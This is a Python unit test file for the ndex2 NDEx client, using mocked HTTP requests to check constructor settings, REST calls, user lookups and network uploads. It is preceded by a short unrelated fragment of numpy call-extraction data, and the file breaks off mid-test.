'import copy\n'), ((10926, 10946), 'numpy.zeros', 'np.zeros', (['self.dim_p'], {}), '(self.dim_p)\n', (10934, 10946), True, 'import numpy as np\n'), ((12103, 12128), 'numpy.ones', 'np.ones', (['agent.color.size'], {}), '(agent.color.size)\n', (12110, 12128), True, 'import numpy as np\n'), ((13176, 13214), 'numpy.random.randn', 'np.random.randn', (['*agent.action.u.shape'], {}), '(*agent.action.u.shape)\n', (13191, 13214), True, 'import numpy as np\n'), ((16979, 17011), 'numpy.square', 'np.square', (['entity.state.p_vel[0]'], {}), '(entity.state.p_vel[0])\n', (16988, 17011), True, 'import numpy as np\n'), ((17014, 17046), 'numpy.square', 'np.square', (['entity.state.p_vel[1]'], {}), '(entity.state.p_vel[1])\n', (17023, 17046), True, 'import numpy as np\n'), ((20570, 20583), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (20576, 20583), True, 'import numpy as np\n'), ((10580, 10605), 'numpy.ones', 'np.ones', (['agent.color.size'], {}), '(agent.color.size)\n', (10587, 10605), True, 'import numpy as np\n'), ((17163, 17195), 'numpy.square', 'np.square', (['entity.state.p_vel[0]'], {}), '(entity.state.p_vel[0])\n', (17172, 17195), True, 'import numpy as np\n'), ((17264, 17296), 'numpy.square', 'np.square', (['entity.state.p_vel[1]'], {}), '(entity.state.p_vel[1])\n', (17273, 17296), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `ndex2.client` package."""
import os
import sys
import io
import decimal
import unittest
import numpy as np
import json
import requests_mock
from unittest.mock import MagicMock
from requests.exceptions import HTTPError
from ndex2 import client
from ndex2.client import Ndex2
from ndex2.client import DecimalEncoder
from ndex2 import __version__
from ndex2.exceptions import NDExInvalidCXError
from ndex2.exceptions import NDExNotFoundError
from ndex2.exceptions import NDExUnauthorizedError
from ndex2.exceptions import NDExInvalidParameterError
from ndex2.exceptions import NDExUnsupportedCallError
from ndex2.exceptions import NDExError
SKIP_REASON = 'NDEX2_TEST_USER environment variable detected, ' \
'skipping for integration tests'
@unittest.skipIf(os.getenv('NDEX2_TEST_SERVER') is not None, SKIP_REASON)
class TestClient(unittest.TestCase):
def get_rest_admin_status_dict(self, version='2.1'):
return {"networkCount": 1321,
"userCount": 12,
"groupCount": 0,
"message": "Online",
"properties": {"ServerVersion": version,
"ServerResultLimit": "10000"}}
def get_rest_admin_v1_empty_dict(self):
return {}
def get_rest_admin_status_url(self):
return client.DEFAULT_SERVER + '/rest/admin/status'
def setUp(self):
"""Set up test fixtures, if any."""
pass
def tearDown(self):
"""Tear down test fixtures, if any."""
pass
def test_decimalencoder(self):
dec = DecimalEncoder()
if sys.version_info.major >= 3:
# test bytes is returned as string
res = dec.default(bytes('hello', 'utf-8'))
self.assertTrue(isinstance(res, str))
# test decimal.Decimal is float
res = dec.default(decimal.Decimal(5))
self.assertTrue(isinstance(res, float))
# test numpy.int64 is int
res = dec.default(np.int64(12))
self.assertTrue(isinstance(res, int))
# test regular old int which throws TypeError
try:
res = dec.default(np.int32(1))
self.assertEqual(res, int(1))
except TypeError:
pass
def test_ndex2_constructor_with_localhost(self):
# this is invasive, but there isn't really a good way
# to test the constructor
# try with nothing set
ndex = Ndex2(host='localhost')
self.assertEqual(ndex.debug, False)
self.assertEqual(ndex.version, 1.3)
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, None)
self.assertEqual(ndex.password, None)
self.assertEqual(ndex.user_agent, '')
self.assertEqual(ndex.host, 'http://localhost:8080/ndexbio-rest')
self.assertTrue(ndex.s is not None)
self.assertTrue(ndex.timeout, 30)
ndex.set_request_timeout(10)
self.assertTrue(ndex.timeout, 30)
# try with user, pass and user_agent set oh and host
# with extra text prepended to localhost
ndex = Ndex2(host='xxxlocalhost', username='bob',
password='<PASSWORD>', user_agent='yo', debug=True,
timeout=1)
self.assertEqual(ndex.debug, True)
self.assertEqual(ndex.version, 1.3)
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, 'bob')
self.assertEqual(ndex.password, '<PASSWORD>')
self.assertEqual(ndex.user_agent, ' yo')
self.assertEqual(ndex.host, 'http://localhost:8080/ndexbio-rest')
self.assertTrue(ndex.s is not None)
self.assertTrue(ndex.timeout, 1)
# try with user_agent set to None Issue #34
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2(user_agent=None)
self.assertEqual(ndex.user_agent, '')
def test_ndex2_constructor_that_raises_httperror(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
text='uhoh',
reason='some error',
status_code=404)
ndex = Ndex2()
self.assertEqual(ndex.debug, False)
self.assertEqual(ndex.version, '1.3')
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, None)
self.assertEqual(ndex.password, None)
self.assertEqual(ndex.user_agent, '')
self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/rest')
self.assertTrue(ndex.s is not None)
def test_ndex2_constructor_with_defaulthost_serverversionnone(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json={"networkCount": 1321,
"userCount": 12,
"groupCount": 0,
"message": "Online",
"properties": {"ServerVersion": None}})
ndex = Ndex2()
self.assertEqual(ndex.debug, False)
self.assertEqual(ndex.version, '1.3')
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, None)
self.assertEqual(ndex.password, None)
self.assertEqual(ndex.user_agent, '')
self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/rest')
self.assertTrue(ndex.s is not None)
def test_ndex2_constructor_with_defaulthost_properties_is_none(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json={"networkCount": 1321,
"userCount": 12,
"groupCount": 0,
"message": "Online"})
ndex = Ndex2()
self.assertEqual(ndex.debug, False)
self.assertEqual(ndex.version, '1.3')
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, None)
self.assertEqual(ndex.password, None)
self.assertEqual(ndex.user_agent, '')
self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/rest')
self.assertTrue(ndex.s is not None)
def test_ndex2_constructor_with_defaulthost_thatisversionone(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json={"networkCount": 1321,
"userCount": 12,
"groupCount": 0,
"message": "Online",
"properties": {"ServerVersion": "1.1",
"ServerResultLimit": "10000"}})
try:
Ndex2()
self.fail('Expected exception')
except Exception as e:
self.assertEqual(str(e),
'This release only supports NDEx 2.x server.')
def test_ndex2_constructor_with_defaulthost_thatisversiontwo(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
self.assertEqual(ndex.debug, False)
self.assertEqual(ndex.version, '2.1')
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, None)
self.assertEqual(ndex.password, None)
self.assertEqual(ndex.user_agent, '')
self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/v2')
self.assertTrue(ndex.s is not None)
def test_ndex2_require_auth(self):
ndex = Ndex2(host='localhost')
try:
ndex._require_auth()
self.fail('Expected exception')
except Exception as e:
self.assertEqual(str(e),
'This method requires user authentication')
def test_ndex2_get_user_agent(self):
ndex = Ndex2(host='localhost')
# try with default
res = ndex._get_user_agent()
self.assertEqual(res, 'NDEx2-Python/' + __version__)
ndex = Ndex2(host='localhost', user_agent='hi')
# try with user_agent set
res = ndex._get_user_agent()
self.assertEqual(res, 'NDEx2-Python/' + __version__ + ' hi')
def test_convert_exception_to_ndex_error(self):
# try passing none
ndex = Ndex2(host='localhost')
try:
ndex._convert_exception_to_ndex_error(None)
except NDExError as ne:
self.assertEqual('Caught unknown error', str(ne))
# try passing in a ValueError
try:
ndex._convert_exception_to_ndex_error(ValueError('hi'))
except NDExError as ne:
self.assertEqual('Caught ValueError: hi', str(ne))
def test_convert_requests_http_error_to_ndex_error(self):
# try passing none
ndex = Ndex2(host='localhost')
try:
ndex._convert_requests_http_error_to_ndex_error(None)
except NDExError as ne:
self.assertEqual('Caught unknown server error', str(ne))
error = MagicMock()
error.response = MagicMock()
error.response.status_code = 404
error.response.text = 'hi'
# try passing in a mock HTTPError
try:
ndex._convert_requests_http_error_to_ndex_error(error)
self.fail('Expected NDExNotFoundError')
except NDExNotFoundError as ne:
self.assertEqual('Caught 404 from server: hi', str(ne))
# try passing in a 500 error
error.response.status_code = 500
try:
ndex._convert_requests_http_error_to_ndex_error(error)
self.fail('Expected NDExError')
except NDExError as ne:
self.assertEqual('Caught 500 from server: hi', str(ne))
def test_ndex2_put_no_json_empty_resp_code_204(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/hi', status_code=204)
ndex = Ndex2()
res = ndex.put('/hi')
self.assertEqual(res, '')
def test_ndex2_put_no_json_empty_code_200(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/hi',
status_code=200,
text='hehe',
request_headers={'Content-Type': 'application/'
'json;charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.put('/hi')
self.assertEqual(res, 'hehe')
def test_ndex2_put_returns_code_401(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/hi',
status_code=401,
text='hehe',
request_headers={'Content-Type': 'application/'
'json;charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'})
ndex = Ndex2()
ndex.set_debug_mode(True)
try:
ndex.put('/hi')
self.fail('Expected HTTPError')
except HTTPError as he:
self.assertEqual(he.response.status_code, 401)
self.assertEqual(he.response.text, 'hehe')
def test_ndex2_put_returns_code_500(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/hi',
status_code=500,
text='hehe',
request_headers={'Content-Type': 'application/'
'json;charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'})
ndex = Ndex2()
ndex.set_debug_mode(True)
try:
ndex.put('/hi')
self.fail('Expected HTTPError')
except HTTPError as he:
self.assertEqual(he.response.status_code, 500)
self.assertEqual(he.response.text, 'hehe')
def test_ndex2_put_with_json_and_json_resp(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/hi',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.put('/hi', put_json='{"x": "y"}')
self.assertEqual(res, {'hi': 'bye'})
def test_ndex2_post_with_json_and_json_resp(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/hi',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.post('/hi', post_json='{"x": "y"}')
self.assertEqual(res, {'hi': 'bye'})
def test_ndex2_delete_with_json_and_json_resp(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/hi',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.delete('/hi', data='{"x": "y"}')
self.assertEqual(res, {'hi': 'bye'})
def test_ndex2_delete_no_data(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/hi',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.delete('/hi')
self.assertEqual(res, {'hi': 'bye'})
def test_ndex2_get_with_json_and_json_resp(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(client.DEFAULT_SERVER + '/v2/hi?x=y',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get('/hi', get_params={"x": "y"})
self.assertEqual(res, {'hi': 'bye'})
def test_ndex2_get_stream_withparams(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(client.DEFAULT_SERVER + '/v2/hi?x=y',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_stream('/hi', get_params={"x": "y"})
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_ndex2_post_stream_withparams(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/hi',
status_code=200,
json={'hi': 'bye'},
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.post_stream('/hi', post_json={"x": "y"})
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_ndex2_put_multipart(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/hi',
request_headers={'Connection': 'close'},
status_code=200)
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.put_multipart('/hi', fields={"x": "y"})
self.assertEqual(res, '')
def test_ndex2_post_multipart(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/hi',
request_headers={'Connection': 'close'},
status_code=200)
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.post_multipart('/hi', fields={"x": "y"})
self.assertEqual(res, '')
def test_ndex2_post_multipart_with_querystring(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/hi?yo=1',
request_headers={'Connection': 'close'},
status_code=200)
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.post_multipart('/hi', {"x": "y"}, query_string='yo=1')
self.assertEqual(res, '')
def test_get_id_for_user_invalid_param(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try where None passed in and client was
# also constructed with anonymous connection so
# no username
try:
ndex.get_id_for_user(None)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertTrue('None passed in this method' in str(ne))
# try where username is not of type str
try:
ndex.get_id_for_user(44)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Username must be of type str', str(ne))
# try where username is empty str
try:
ndex.get_id_for_user('')
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Username cannot be empty str', str(ne))
def test_get_user_by_username(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl, json={'userName': 'bob'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_user_by_username('bob')
self.assertEqual('bob', res['userName'])
def test_get_id_for_user_success(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl, json={'externalId': '12345'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
self.assertEqual('12345', ndex.get_id_for_user('bob'))
def test_get_id_for_user_httperror(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
status_code=404,
text='error',
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
try:
ndex.get_id_for_user('bob')
self.fail('Expected NDExNotFoundError')
except NDExNotFoundError as ne:
self.assertEqual('Caught 404 from server: error',
str(ne))
def test_get_id_for_user_exception(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
try:
ndex.get_id_for_user('bob')
self.fail('Expected NDExError')
except NDExError as ne:
self.assertTrue('Caught JSONDecodeError:' in str(ne))
def test_get_id_for_user_no_external_id(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
json={'uhoh': 'missing'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
try:
ndex.get_id_for_user('bob')
self.fail('Expected NDExError')
except NDExError as ne:
self.assertTrue('Unable to get user id for user: bob',
str(ne))
def test_get_user_by_id_invalid_user_id(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try passing None
try:
ndex.get_user_by_id(None)
self.fail('Expect NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('user_id must be a str', str(ne))
# try passing empty string
try:
ndex.get_user_by_id('')
self.fail('Expect NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('user_id cannot be an empty str', str(ne))
def test_get_user_by_id_success(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
json={'userName': 'foo'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_user_by_id('foo')
self.assertEqual('foo', res['userName'])
def test_get_user_by_id_404_error(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
text='some error', status_code=404)
ndex = Ndex2()
try:
res = ndex.get_user_by_id('foo')
self.fail('Expected NDExNotFoundError: ' + str(res))
except NDExNotFoundError as ne:
self.assertEqual('Caught 404 from server: some error',
str(ne))
def test_get_user_by_id_500_error(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
text='error', status_code=500)
ndex = Ndex2()
try:
res = ndex.get_user_by_id('foo')
self.fail('Expected NDExNotFoundError: ' + str(res))
except NDExError as ne:
self.assertEqual('Caught 500 from server: error',
str(ne))
def test_get_user_by_id_random_exception(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
try:
res = ndex.get_user_by_id('foo')
self.fail('Expected NDExError: ' + str(res))
except NDExError as ne:
self.assertTrue('Caught JSONDecodeError' in str(ne))
def test_get_networksets_for_user_invalid_userid(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try where user id is None
try:
ndex.get_networksets_for_user_id(None)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('user_id must be of type str',
str(ne))
# try where user id is not of type str
try:
ndex.get_networksets_for_user_id(4)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('user_id must be of type str',
str(ne))
def test_get_networksets_for_user_invalid_limit(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try where limit is not int or str
try:
ndex.get_networksets_for_user_id('foo', limit=3.5)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertTrue('limit parameter must be of type '
'int ' in str(ne))
def test_get_networksets_for_user_invalid_offset_type(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try where limit is not int or str
try:
ndex.get_networksets_for_user_id('foo', offset=3.5)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertTrue('offset parameter must be of type '
'int ' in str(ne))
def test_get_networksets_for_user_invalid_offset(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try where limit is not int or str
try:
ndex.get_networksets_for_user_id('foo', offset=5)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertTrue('limit (0) parameter must be set to '
'positive ' in str(ne))
def test_get_networksets_for_user_success(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo/networksets'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl, json={'hi': 'there'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_networksets_for_user_id('foo',
summary_only=False,
showcase=True)
self.assertEqual('there', res['hi'])
def test_get_networksets_for_user_httperror(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo/networksets'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl, status_code=404)
ndex = Ndex2()
try:
ndex.get_networksets_for_user_id('foo')
except NDExNotFoundError as ne:
self.assertEqual('Caught 404 from server: ', str(ne))
def test_get_networksets_for_user_exception(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user/foo/networksets'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
try:
ndex.get_networksets_for_user_id('foo')
except NDExError as ne:
self.assertTrue('Caught JSONDecodeError: ' in str(ne))
def test_save_new_network_none_as_cx(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.save_new_network(None)
self.fail('expected NDExInvalidCXError')
except NDExInvalidCXError as ice:
self.assertEqual(str(ice), 'CX is None')
def test_save_new_network_invalid_as_cx(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.save_new_network('hi')
self.fail('expected NDExInvalidCXError')
except NDExInvalidCXError as ice:
self.assertEqual(str(ice), 'CX is not a list')
def test_save_new_network_empty_cx(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.save_new_network([])
self.fail('expected NDExInvalidCXError')
except NDExInvalidCXError as ice:
self.assertEqual(str(ice), 'CX appears to be empty')
def test_save_new_network_cx_with_no_status(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/network',
request_headers={'Connection': 'close'},
status_code=1,
text=resurl)
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.save_new_network([{'foo': '123'}])
self.assertEqual(res, resurl)
decode_txt = m.last_request.text.read().decode('UTF-8')
self.assertTrue('Content-Disposition: form-data; '
'name="CXNetworkStream"; '
'filename="filename"' in decode_txt)
self.assertTrue('Content-Type: application/'
'octet-stream' in decode_txt)
self.assertTrue('{"foo": "123"}' in decode_txt)
self.assertTrue('{"status": [{"' in decode_txt)
self.assertTrue('"error": ""' in decode_txt)
self.assertTrue('"success": true' in decode_txt)
def test_save_new_network_cx_with_no_status_ndexv1(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/rest/network/asdf'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.post(client.DEFAULT_SERVER + '/rest/network/asCX',
request_headers={'Connection': 'close'},
status_code=1,
text=resurl)
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.save_new_network([{'foo': '123'}])
self.assertEqual(res, resurl)
decode_txt = m.last_request.text.read().decode('UTF-8')
self.assertTrue('Content-Disposition: form-data; '
'name="CXNetworkStream"; '
'filename="filename"' in decode_txt)
self.assertTrue('Content-Type: application/'
'octet-stream' in decode_txt)
self.assertTrue('{"foo": "123"}' in decode_txt)
self.assertTrue('{"status": [{"' in decode_txt)
self.assertTrue('"error": ""' in decode_txt)
self.assertTrue('"success": true' in decode_txt)
def test_save_new_network_cx_with_emptystatus_and_publicvisibility(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/network?visibility=PUBLIC',
request_headers={'Connection': 'close'},
status_code=1,
text=resurl)
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.save_new_network([{'foo': '123'},
{"status": []}],
visibility='PUBLIC')
self.assertEqual(res, resurl)
decode_txt = m.last_request.text.read().decode('UTF-8')
self.assertTrue('Content-Disposition: form-data; '
'name="CXNetworkStream"; '
'filename="filename"' in decode_txt)
self.assertTrue('Content-Type: application/'
'octet-stream' in decode_txt)
self.assertTrue('{"foo": "123"}' in decode_txt)
self.assertTrue('{"status": [{"' in decode_txt)
self.assertTrue('"error": ""' in decode_txt)
self.assertTrue('"success": true' in decode_txt)
def test_save_new_network_cx_with_status(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/network',
request_headers={'Connection': 'close'},
status_code=1,
text=resurl)
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.save_new_network([{'foo': '123'},
{"status": [{"error": "",
"success": True}]}])
self.assertEqual(res, resurl)
decode_txt = m.last_request.text.read().decode('UTF-8')
self.assertTrue('Content-Disposition: '
'form-data; name="CXNetworkStream"; '
'filename="filename"' in decode_txt)
self.assertTrue('Content-Type: application/'
'octet-stream' in decode_txt)
self.assertTrue('{"foo": "123"}' in decode_txt)
self.assertTrue('{"status": [{"' in decode_txt)
self.assertTrue('"error": ""' in decode_txt)
self.assertTrue('"success": true' in decode_txt)
def test_update_cx_network_success(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/someid',
request_headers={'Connection': 'close'},
status_code=1,
text=resurl)
ndex = Ndex2(username='bob', password='<PASSWORD>')
cx = [{'foo': '123'},
{"status": [{"error": "", "success": True}]}]
if sys.version_info.major == 3:
stream = io.BytesIO(json.dumps(cx,
cls=DecimalEncoder)
.encode('utf-8'))
else:
stream = io.BytesIO(json.dumps(cx, cls=DecimalEncoder))
res = ndex.update_cx_network(stream, 'someid')
self.assertEqual(res, resurl)
decode_txt = m.last_request.text.read().decode('UTF-8')
self.assertTrue('Content-Disposition: form-data; '
'name="CXNetworkStream"; '
'filename="filename"' in decode_txt)
self.assertTrue('Content-Type: application/'
'octet-stream' in decode_txt)
self.assertTrue('{"foo": "123"}' in decode_txt)
self.assertTrue('{"status": [{"' in decode_txt)
self.assertTrue('"error": ""' in decode_txt)
self.assertTrue('"success": true' in decode_txt)
def test_update_cx_network_success_ndexv1(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/rest/network/asdf'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.put(client.DEFAULT_SERVER + '/rest/network/asCX/someid',
request_headers={'Connection': 'close'},
status_code=1,
text=resurl)
ndex = Ndex2(username='bob', password='<PASSWORD>')
cx = [{'foo': '123'},
{"status": [{"error": "", "success": True}]}]
if sys.version_info.major == 3:
stream = io.BytesIO(json.dumps(cx,
cls=DecimalEncoder)
.encode('utf-8'))
else:
stream = io.BytesIO(json.dumps(cx, cls=DecimalEncoder))
res = ndex.update_cx_network(stream, 'someid')
self.assertEqual(res, resurl)
decode_txt = m.last_request.text.read().decode('UTF-8')
self.assertTrue('Content-Disposition: form-data; '
'name="CXNetworkStream"; '
'filename="filename"' in decode_txt)
self.assertTrue('Content-Type: application/'
'octet-stream' in decode_txt)
self.assertTrue('{"foo": "123"}' in decode_txt)
self.assertTrue('{"status": [{"' in decode_txt)
self.assertTrue('"error": ""' in decode_txt)
self.assertTrue('"success": true' in decode_txt)
def test_validate_network_system_properties(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
# try passing none
try:
ndex._validate_network_system_properties(None)
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('network_properties must be a '
'string or a dict', str(ne))
# try passing empty string
try:
ndex._validate_network_system_properties('')
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertTrue('Error parsing json string' in str(ne))
# try passing empty dict
